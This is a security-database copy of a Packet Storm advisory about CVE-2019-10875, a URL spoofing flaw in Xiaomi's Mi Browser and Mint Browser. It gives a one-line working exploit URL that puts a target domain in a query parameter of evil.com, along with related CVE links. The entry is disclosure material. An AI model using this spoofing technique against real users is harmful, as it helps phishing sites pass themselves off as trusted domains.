Lucene search
Arif KhanPACKETSTORM:152497HistoryApr 11, 2019 - 12:00 a.m.
Xiaomi Mi Browser / Mint Browser URL Spoofing
2019-04-1100:00:00
Arif Khan
packetstormsecurity.com
27
0.008 Low
EPSS
Percentile
81.8%
`# Exploit Title: URL Spoofing Exploit for Xiaomi Mi Browser (v10.5.6-g) and Mint Browser (v1.5.3)
# Date : 11/04/2019
# Exploit Author: Arif Khan (@payloadartist)
# Vendor Homepage: www.xiaomi.com
# Version : v10.5.6-g and v1.5.3
# Tested On : MIUI OS, v10.1.3.0
# CVE : CVE-2019-10875
Exploit: https://www.evil.com/?q=www.target.com
The attacker can thus pass off his site, www.evil.com as www.target.com due to the way Xiaomi browsers handle the query parameter's value.
`
Related
cve
cve
CVE-2019-10875
2019-04-05 13:29:00
prion
prion
Spoofing
2019-04-05 13:29:00
cvelist
cvelist
CVE-2019-10875
2019-04-05 12:36:49
thn
thn
Unpatched Flaw in Xiaomi's Built-in Browser App Lets Hackers Spoof URLs
2019-04-05 10:44:00
nvd
nvd
CVE-2019-10875
2019-04-05 13:29:00